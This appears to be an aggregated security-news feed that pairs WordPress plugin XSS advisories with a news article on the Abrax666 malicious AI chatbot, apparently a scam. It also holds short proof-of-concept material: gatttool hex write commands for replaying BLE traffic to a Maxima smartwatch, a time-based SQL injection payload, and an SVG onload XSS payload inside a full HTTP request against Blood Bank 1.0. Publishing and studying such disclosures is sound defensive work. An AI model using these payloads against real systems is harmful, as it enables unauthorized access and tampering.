Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in edward_plainview Plainview Protect Passwords plugin <= 1.4 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Plainview Protect Passwords Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47665: WordPress Plainview Protect Passwords plugin <= 1.4 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in GoldBroker.Com Live Gold Price & Silver Price Charts Widgets plugin <= 2.4 versions.

**Solution**

 No fix

No patched version is available.

Emili Castells discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Live Gold Price & Silver Price Charts Widgets Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47662: WordPress Live Gold Price & Silver Price Charts Widgets plugin <= 2.4 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Stefano Ottolenghi Post Pay Counter plugin <= 2.789 versions.

**Solution**

 No fix

No patched version is available.

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Post Pay Counter Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 1 present

 1 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47673: WordPress Post Pay Counter plugin <= 2.789 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (ShopManager+) Stored Cross-Site Scripting (XSS) vulnerability in GrandPlugins Direct Checkout – Quick View – Buy Now For WooCommerce plugin <= 1.5.8 versions.

**Solution**

 Fixed

Update the WordPress Direct Checkout – Quick View – Buy Now For WooCommerce plugin to the latest available version (at least 1.5.9).

Emili Castells discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Direct Checkout – Quick View – Buy Now For WooCommerce Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.5.9.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47657: WordPress Direct Checkout – Quick View – Buy Now For WooCommerce plugin <= 1.5.8 - Cross Site Scripting (XSS) vulnerability - Patchstack

Maxima Max Pro Power with firmware version 1.0 486A suffers from a BLE traffic replay vulnerability that allows for arbitrary unauthorized actions.

    # Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)# Date: 13-Nov-2023# Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.# Vendor Homepage: https://www.maximawatches.com# Product Link: https://www.maximawatches.com/products/max-pro-power# Firmware Version: v1.0 486A# Tested on: Maxima Max Pro Power# CVE : CVE-2023-46916# It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.# And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions# Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”# “sudo gattool -I” Starts gattool in interactive mode.# “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.# “char-desc” Lists all handles for the device.# Run “mtu 247” in Gatttool after connection to set MTU for active connection.# Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.

Maxima Max Pro Power 1.0 486A BLE Traffic Replay

Zephyr RTOS versions 3.5.0 and below suffer from a multitude of buffer overflow vulnerabilities.

Zephyr RTOS 3.x.0 Buffer Overflows

WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection# Date: 12-11-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.2 # Tested on: Windows, Linux# CVE: CVE-2023-32741# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of ConceptAffected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=Affected Parameter: form_idpayload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -# RecommendationUpgrade to version 1.1.3

WordPress Contact Form To Any API 1.1.2 SQL Injection

By Waqas
Abrax666 AI Chatbot is being boasted by its developer as a malicious alternative to ChatGPT, claiming it's a perfect multitasking tool for both ethical and unethical activities.
This is a post from HackRead.com Read the original post: Malicious Abrax666 AI Chatbot Exposed as Potential Scam

As of now, based on the information regarding the sale of the Abrax666 AI Chatbot, cybersecurity researchers are of the opinion that the chatbot is most likely a scam.

As of late October 2023, cybercriminals have been advertising a new malicious AI chatbot called Abrax666 on the **dark web** and underground hacking forums. The developer of the Abrax666 AI chatbot has been boasting about the chatbot claiming it to be a perfect multitasking tool for ethical and unethical activities.

Currently, the pricing structure of the Abrax666 AI chatbot is €299 per month, and €2499 per year, while its source code is available for sale for €4999, however, according to cybersecurity researchers at SlashNext, the Abrax666 chatbot is likely to be fake, and could be an attempt to scam buyers.

Abrax666 Chatbot’s listing (Screenshot credit: Hackread.com)

It is worth noting that after the launch of OpenAI’s ChatGPT chatbot, cybercriminals attempted to exploit it for malicious purposes. In particular, Russian hackers **tried** to leverage the chatbot to create malware and phishing pages. While there was **some success**, to escalate their efforts, cybercriminals launched their own malicious chatbots, including **WormGPT** and **FraudGPT**.

In the latest report, SlashNext’s cybersecurity researcher Daniel Kelley highlighted several red flags indicating how the Abrax666 AI chatbot could be a scam despite the big claims. The chatbot is being sold by a threat actor using the alias Abrax on a notorious Russian-language forum where the rule of sale includes sellers depositing some amount of money to initiate the sales process.

However, Abrax not only did not deposit the funds but also refused to allow interested parties to review the chatbot before making a purchase. One potential buyer using the alias ‘SocketSilence’ stated that Abrax failed to provide any evidence of whether they have sold the chatbot previously or if it actually works.

(Screenshot credit: Hackread.com)

Despite video demonstrations shared by the seller, the authenticity of the chatbot’s capabilities remains in question. The videos, according to Kelley, do not exhibit standard AI chatbot behaviour and appear more like a standard tool.

“The only potentially credible evidence that has caused us to slightly defer our verdict here, are videos being circulated by ‘Abrax’ that allegedly show the AI chatbot in use,” Daniel explained in a **blog post**.

“However, even these videos do not appear to showcase the standard output one would expect from an AI chatbot of this nature. The output appears to look more like a standard tool that is not capable of real-time communication and does not accept prompts but arguments and flags instead,” the researcher added.

Abrax’s attempt to sell the chatbot on other cybercrime forums resulted in the removal of the threat, possibly due to administrators detecting malicious intent. Furthermore, the topic initiated by Abrax was locked by forum administrators at the time of writing.

One of the admins cautioned Abrax about their claims (Screenshot credit: Hackread.com).

Overall, the SlashNext report casts doubt on the legitimacy of the Abrax666 AI chatbot, cautioning potential buyers against its advertised capabilities. However, if the seller provides evidence that their product is legitimate and aligns with the claims they have made, it could likely change the minds of researchers.

****_RELATED ARTICLES_****

1.  **DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web**
2.  **Chinese Scammers Use Fake Loan Apps for Money Laundering**
3.  **Fake Ledger App on Microsoft Store to Stole $800,000 in Crypto**

Malicious Abrax666 AI Chatbot Exposed as Potential Scam

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

**CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a critical security vulnerability involving Stored Cross-Site Scripting (XSS) through multiple parameters (rename, remail, rphone, and rcity) in the /updateprofile.php file. The application fails to adequately sanitize user-supplied data, allowing attackers to inject malicious scripts into the application. This could lead to the execution of arbitrary script code in the browsers of unsuspecting users, potentially compromising their security and privacy within the context of the affected site.

**Vulnerability Details**

*   CVE ID: CVE-2023-46020
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: updateprofile.php
*   Parameters: rename, remail, rphone, rcity
*   Attack Type: local

**Description**

*   The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

**Proof of Concept (PoC) :**

*   Intercept the POST request to updateprofile.php via Burp Suite
*   Inject the payload to the vulnerable parameters
*   Payload: "><svg/onload=alert(document.domain)>
*   Example request for rname parameter

    POST /bloodbank/file/updateprofile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/rprofile.php?id=1
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
    

*   Go to the profile page and trigger the XSS

CVE-2023-46020: GitHub - ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin <= 3.1.39 versions.

**Solution**

 No fix

No patched version is available.

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Event Manager Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 1 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#auth